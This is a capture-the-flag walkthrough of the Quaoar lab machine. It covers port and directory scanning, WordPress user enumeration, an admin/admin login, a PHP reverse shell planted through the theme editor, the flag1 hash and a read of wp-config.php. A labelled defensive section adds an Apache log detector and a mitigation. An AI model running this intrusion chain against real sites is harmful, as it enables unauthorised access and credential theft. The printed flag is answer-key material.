boaxboax / ctf-Quaorar


ctf-Quaorar

Opening with nmap:

```
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
|   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp  open  domain      ISC BIND 9.8.1-P1
| dns-nsid:
|_  bind.version: 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3?
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-10-16T05:14:13+00:00; 0s from scanner time.
995/tcp open  ssl/pop3s?
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
MAC Address: 08:00:27:77:97:F9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

and one dirb run:

```
dirb http://192.168.1.96/ /home/boax/Téléchargements/common.txt
```

```
---- Entering directory: http://192.168.1.96/wordpress/ ----
==> DIRECTORY: http://192.168.1.96/wordpress/index/
```

Site built with WordPress!

wpscan attack:

```
ruby wpscan.rb -u http://192.168.1.96/wordpress --enumerate u
```

```
    __          _______   _____                  
    \ \        / /  __ \ / ____|                 
     \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
      \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
       \  /\  /  | |     ____) | (__| (_| | | | |
        \/  \/   |_|    |_____/ \___|\__,_|_| |_|

    WordPress Security Scanner by the WPScan Team 
                   Version 2.9.4-dev
      Sponsored by Sucuri - https://sucuri.net
  @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_

[+] URL: http://192.168.1.96/wordpress/
[+] Started: Thu Oct 19 20:14:14 2017

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    +----+--------+--------+
    | Id | Login  | Name   |
    +----+--------+--------+
    | 1  | admin  | admin  |
    | 2  | wpuser | wpuser |
    +----+--------+--------+
```

Log in at http://192.168.1.96/wordpress/wp-login.php?loggedout=true with admin/admin.

Then, on the dashboard, under Appearance / Editor / Header, we can put a reverse shell (http://pentestmonkey.net/tools/web-shells/php-reverse-shell). Set it up with your IP and, for example, port 4444 open.

So listen on 4444:

```
which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Quaoar:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Quaoar:/$ ls -lat
ls -lat
total 85
drwxr-xr-x  15 root root  4000 Oct 19  2017 dev
drwxr-xr-x 117 root root  4096 Oct 19  2017 etc
drwxr-xr-x  13 root root     0 Oct 19  2017 sys
drwxrwxrwt   3 root root  4096 Oct 19 14:23 tmp
drwxr-xr-x  24 root root   780 Oct 19 14:12 run
dr-xr-xr-x 107 root root     0 Oct 19 14:12 proc
drwxr-xr-x  13 root root  4096 Jan 15  2017 var
drwx------   6 root root  4096 Nov 30  2016 root
drwxr-xr-x   4 root root  1024 Oct 28  2016 boot
drwxr-xr-x   2 root root  4096 Oct 28  2016 sbin
drwxr-xr-x   3 root root  4096 Oct 24  2016 home
drwxr-xr-x  22 root root  4096 Oct  7  2016 .
drwxr-xr-x  22 root root  4096 Oct  7  2016 ..
-rw-------   1 root root  1024 Oct  7  2016 .rnd
drwxr-xr-x  21 root root  4096 Oct  7  2016 lib
drwxr-xr-x   2 root root  4096 Oct  7  2016 bin
lrwxrwxrwx   1 root root    33 Oct  7  2016 vmlinuz -> boot/vmlinuz-3.2.0-23-generic-pae
lrwxrwxrwx   1 root root    37 Oct  7  2016 initrd.img -> /boot/initrd.img-3.2.0-23-generic-pae
drwxr-xr-x   3 root root  4096 Oct  7  2016 media
drwxr-xr-x  10 root root  4096 Oct  7  2016 usr
drwxr-xr-x   2 root root  4096 Oct  7  2016 opt
drwxr-xr-x   2 root root  4096 Oct  7  2016 srv
drwx------   2 root root 16384 Oct  7  2016 lost+found
drwxr-xr-x   2 root root  4096 Apr 19  2012 mnt
drwxr-xr-x   2 root root  4096 Mar  5  2012 selinux
```
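The chain used above (user enumeration with wpscan, a login on wp-login.php with the default admin/admin, then a write through the theme editor) leaves a distinctive trail in the Apache access log. The following is an added defender's example, not part of the original writeup: a small Python detector run over constructed sample lines. It assumes Apache combined log format and the /wordpress/ prefix seen on this host; the client address 192.168.1.50, the timestamps and the 10.0.0.7 bystander are made up.

```python
import re
from collections import defaultdict

# Apache combined log format (what the Apache 2.2.22 on this host writes by default).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Constructed sample: wpscan-style ?author=N probes, a login, then a theme-editor POST,
# plus one unrelated visitor. Addresses and times are invented for the example.
SAMPLE_LOG = """\
192.168.1.50 - - [19/Oct/2017:20:14:14 +0000] "GET /wordpress/?author=1 HTTP/1.1" 301 0
192.168.1.50 - - [19/Oct/2017:20:14:14 +0000] "GET /wordpress/?author=2 HTTP/1.1" 301 0
192.168.1.50 - - [19/Oct/2017:20:14:15 +0000] "GET /wordpress/?author=3 HTTP/1.1" 404 0
192.168.1.50 - - [19/Oct/2017:20:16:02 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0
192.168.1.50 - - [19/Oct/2017:20:17:40 +0000] "POST /wordpress/wp-admin/theme-editor.php HTTP/1.1" 302 0
10.0.0.7 - - [19/Oct/2017:20:18:00 +0000] "GET /wordpress/ HTTP/1.1" 200 5120
"""

def analyse(log_text, author_threshold=3):
    """Return {ip: [findings]}: author-id enumeration, theme-editor writes,
    and the combination of the two from one client (this writeup's chain)."""
    authors = defaultdict(set)      # ip -> distinct author ids probed
    editor_posts = defaultdict(int)  # ip -> number of theme-editor POSTs
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, method, path = m['ip'], m['method'], m['path']
        a = re.search(r'[?&]author=(\d+)', path)
        if a:
            authors[ip].add(int(a.group(1)))
        if method == 'POST' and path.split('?')[0].endswith('/wp-admin/theme-editor.php'):
            editor_posts[ip] += 1
    for ip, ids in authors.items():
        if len(ids) >= author_threshold:
            findings[ip].append(f'author enumeration ({len(ids)} ids)')
    for ip, n in editor_posts.items():
        findings[ip].append(f'theme editor write ({n})')
        if len(authors[ip]) >= author_threshold:
            findings[ip].append('enumeration followed by theme edit')
    return dict(findings)

if __name__ == '__main__':
    for ip, hits in analyse(SAMPLE_LOG).items():
        print(ip, '->', '; '.join(hits))
```

The editor path itself is closed by defining `DISALLOW_FILE_EDIT` as true in wp-config.php, which removes the Appearance / Editor screen entirely.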

Further on:

```
cd home
www-data@Quaoar:/home$ ls
ls
wpadmin
www-data@Quaoar:/home$ cd wpadmin
cd wpadmin
www-data@Quaoar:/home/wpadmin$ ls
ls
flag.txt
www-data@Quaoar:/home/wpadmin$ cat flag.txt
cat flag.txt
2bafe61f03117ac66a73c3c514de796e
```

That's flag1!!!

So, let's go on:

```
cd var
www-data@Quaoar:/var$ ls
ls
backups  cache  crash  lib  local  lock  log  mail  opt  run  spool  tmp  www
www-data@Quaoar:/var$ cd www
cd www
www-data@Quaoar:/var/www$ ls
ls
CHANGELOG                       hack-planet-high-definition-mobile.jpg
COPYING                         hacker-manifesto-ethical.jpg
Hack_The_Planet.jpg             hacking.jpg
Hack_The_Planet2.jpg            hsperfdata_tomcat6
Hack_The_Planet3.jpg            index.html
INSTALL                         pososibo-ethical-hacking-hack-fond.jpg
LICENSE                         robots.txt
Quaoar.jpg                      tomcat6-tomcat6-tmp
README.md                       upload
hack-planet-1280-amox-zone.jpg  wordpress
www-data@Quaoar:/var/www$ cd wordpress
cd wordpress
www-data@Quaoar:/var/www/wordpress$ ls
ls
index.php        wp-blog-header.php    wp-cron.php        wp-mail.php
license.txt      wp-comments-post.php  wp-includes        wp-settings.php
readme.html      wp-config-sample.php  wp-links-opml.php  wp-signup.php
wp-activate.php  wp-config.php         wp-load.php        wp-trackback.php
wp-admin         wp-content            wp-login.php       xmlrpc.php
```

and cat wp-config.php:

```
cat wp-config.php
cat wp-config.php
```
